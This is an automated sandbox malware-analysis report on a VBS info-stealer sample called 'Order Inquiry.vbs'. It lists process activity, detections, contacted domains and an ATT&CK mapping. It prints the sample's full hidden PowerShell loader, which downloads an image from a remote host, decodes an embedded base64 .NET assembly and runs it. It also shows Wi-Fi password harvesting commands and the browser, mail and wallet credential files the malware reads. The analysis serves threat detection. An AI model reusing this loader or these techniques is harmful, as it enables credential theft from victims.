gtrelgbjdgtreg8dgtrebqdgtreudgtregidgtrecgdgtrevdgtregkdg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $downloadeddata = @(); $shuffledlinks = $links \| get-random -count $links.length; foreach ($link in $shuffledlinks) { try { $downloadeddata += $webclient.downloaddata($link) } catch { continue } }; return $downloadeddata }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $commandbytes = [system.convert]::frombase64string($base64command); $loadedassembly = [system.reflection.assembly]::load($commandbytes); $type = $loadedassembly.gettype('runpe.home'); $method = $type.getmethod('vai').invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\c\program files\' , 'aburrar','addinprocess32',''))} }"	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Uses netsh to modify the Windows network and firewall settings

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1674833738.00000000014D1000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected PXRECVOWEIWOEI Stealer

Source: Yara match	File source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: BERT-PC\root\cimv2:Win32_Product.IdentifyingNumber="{4A03706F-666A-4037-7777-5F2748764D10}",Name="Java Auto Updater",Version="2.8.381.9"Jaxx
Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q4C:\Users\user\AppData\Roaming\Exodus\exodus.wallett-
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Exodus
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q1C:\Users\user\AppData\Roaming\Ethereum\keystoret-
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000300D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q5C:\Users\user\AppData\Local\Coinomi\Coinomi\walletst-
Source: powershell.exe, 00000003.00000002.1993317728.00007FFB4B1A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Opens network shares

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: \\tsclient\C\Program Files\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\tsclient\C\Program Files\aburrar.vbs	Jump to behavior
Source: C:\Windows\System32\cmd.exe	File opened: \\tsclient\C\Program Files\aburrar.vbs	Jump to behavior

Tries to harvest and steal WLAN passwords

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key3.db	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior

Source: Yara match

File source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR

Remote Access Functionality

Yara detected PXRECVOWEIWOEI Stealer

Source: Yara match	File source: 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: AddInProcess32.exe PID: 8168, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	131 Windows Management Instrumentation	221 Scripting	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	1 DLL Side-Loading	311 Process Injection	3 Obfuscated Files or Information	LSASS Memory	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Command and Scripting Interpreter	11 Registry Run Keys / Startup Folder	11 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	1 Network Share Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	451 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	161 Virtualization/Sandbox Evasion	Cached Domain Credentials	161 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Order Inquiry.vbs	5%	Virustotal		Browse
Order Inquiry.vbs	0%	ReversingLabs

Source	Detection	Scanner	Link
paste.ee	1%	Virustotal	Browse
whatismyipaddressnow.co	6%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
uploaddeimagens.com.br	5%	Virustotal	Browse
75.103.13.0.in-addr.arpa	0%	Virustotal	Browse
icanhazip.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://ip-api.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://ip-api.com/line/?fields=hosting	0%	URL Reputation	safe
https://aka.ms/pscore6	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://analytics.paste.ee	0%	Avira URL Cloud	safe
https://go.microsoft.co	0%	Avira URL Cloud	safe
http://icanhazip.com/	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=enWeb	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hl=en	0%	Avira URL Cloud	safe
https://paste.ee/d/3dasY	0%	Avira URL Cloud	safe
https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh	0%	Avira URL Cloud	safe
https://www.oracle.com/technetwork/java/javase/downloads	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
http://93.123.39.71/sword.txt	100%	Avira URL Cloud	malware
https://paste.ee/d/3dasY0	0%	Avira URL Cloud	safe
http://icanhazip.com	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com;	0%	Avira URL Cloud	safe
https://paste.ee/d/3dasY4	0%	Avira URL Cloud	safe
https://secure.gravatar.com	0%	Avira URL Cloud	safe
https://www.office.com/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://paste.ee/d/3dasY$	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l	0%	Avira URL Cloud	safe
https://www.google.com;	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.office.com/Office	0%	Avira URL Cloud	safe
http://crl.rootca1.amazontrust.com/rootca1.crl0	0%	Avira URL Cloud	safe
https://chrome.google.com/webstore?hT	0%	Avira URL Cloud	safe
http://ocsp.rootca1.amazontrust.com0:	0%	Avira URL Cloud	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	Avira URL Cloud	safe
https://www.office.com/LR	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://paste.ee/_	0%	Avira URL Cloud	safe
https://whatismyipaddressnow.co/API/FETCH/getcountry.php	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138	0%	Avira URL Cloud	safe
https://paste.ee/d/3dasYz	0%	Avira URL Cloud	safe
http://crt.rootca1.amazontrust.com/rootca1.cer0?	0%	Avira URL Cloud	safe
https://analytics.paste.ee;	0%	Avira URL Cloud	safe
https://support.mozilla.org	0%	Avira URL Cloud	safe
http://whatismyipaddressnow.co	0%	Avira URL Cloud	safe
https://paste.ee/H	0%	Avira URL Cloud	safe
https://themes.googleusercontent.com	0%	Avira URL Cloud	safe
https://whatismyipaddressnow.co	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
paste.ee	188.114.97.3	true	true	1%, Virustotal, Browse	unknown
whatismyipaddressnow.co	188.114.96.3	true	false	6%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
uploaddeimagens.com.br	188.114.97.3	true	true	5%, Virustotal, Browse	unknown
icanhazip.com	104.16.185.241	true	false	0%, Virustotal, Browse	unknown
75.103.13.0.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://icanhazip.com/	false	Avira URL Cloud: safe	unknown
https://paste.ee/d/3dasY	true	Avira URL Cloud: safe	unknown
https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh	true	Avira URL Cloud: safe	unknown
http://93.123.39.71/sword.txt	false	Avira URL Cloud: malware	unknown
https://whatismyipaddressnow.co/API/FETCH/getcountry.php	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138	true	Avira URL Cloud: safe	unknown
http://ip-api.com/line/?fields=hosting	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
https://go.microsoft.co	powershell.exe, 00000003.00000002.1977414907.000001E4E7D10000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://analytics.paste.ee	wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000003.00000002.1937420985.000001E4CFCF9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=en	AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmp7752.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
https://chrome.google.com/webstore?hl=enWeb	tmp7752.tmp.dat.9.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com	wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.oracle.com/technetwork/java/javase/downloads	AddInProcess32.exe, 00000009.00000002.1735664078.000000000616C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	cert9.db.9.dr	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	cert9.db.9.dr	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.dr	false	URL Reputation: safe	unknown
http://ip-api.com	AddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://paste.ee/d/3dasY0	wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com	wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://icanhazip.com	AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com;	wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://paste.ee/d/3dasY4	wscript.exe, 00000000.00000003.1409306033.00000260C2CFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411281235.00000260C2D37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410321938.00000260C2D37000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000003.00000002.1937420985.000001E4CFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://secure.gravatar.com	wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
